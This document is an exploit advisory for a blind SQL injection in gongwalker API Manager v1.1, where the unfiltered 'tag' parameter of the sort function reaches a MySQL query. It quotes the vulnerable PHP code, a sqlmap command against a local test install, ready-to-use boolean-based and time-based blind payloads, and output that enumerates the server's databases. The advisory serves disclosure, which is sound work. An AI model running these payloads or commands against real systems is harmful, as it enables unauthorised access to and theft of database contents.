# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
# Date: 2017-05-10
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/gongwalker/ApiManager
# Software Link: https://github.com/gongwalker/ApiManager.git
# Version: v1.1
# Tested on: Debian

### Vulnerable
SQL Injection vulnerability exists in the execution of the sort function below.
The value entered with the aid parameter is executed as SQL qeury without being filtered.
 - sort funcion in code- 
 
   case 'sort':
            $sql = "select cname from cate where aid='{$_GET['tag']}' and isdel=0";
            $menu = find($sql);
            $menu = ' - ' . "<a href='".U(array('act'=>'api','tag'=>$_GET['tag']))."'>{$menu['cname']}</a>";
            $file ='./MinPHP/run/sort.php';
            break;


### sqlmap command
#> sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=sort&tag=2" --level 4 --no-cast --dbs

Parameter: tag (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=sort&tag=2' AND 5619=5619 AND 'Sknb'='Sknb

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=sort&tag=2' AND (SELECT * FROM (SELECT(SLEEP(5)))pkJT) AND 'tqrU'='tqrU
---
[16:25:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5.0.12

...

available databases [7]:
[*] gongwalker
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
....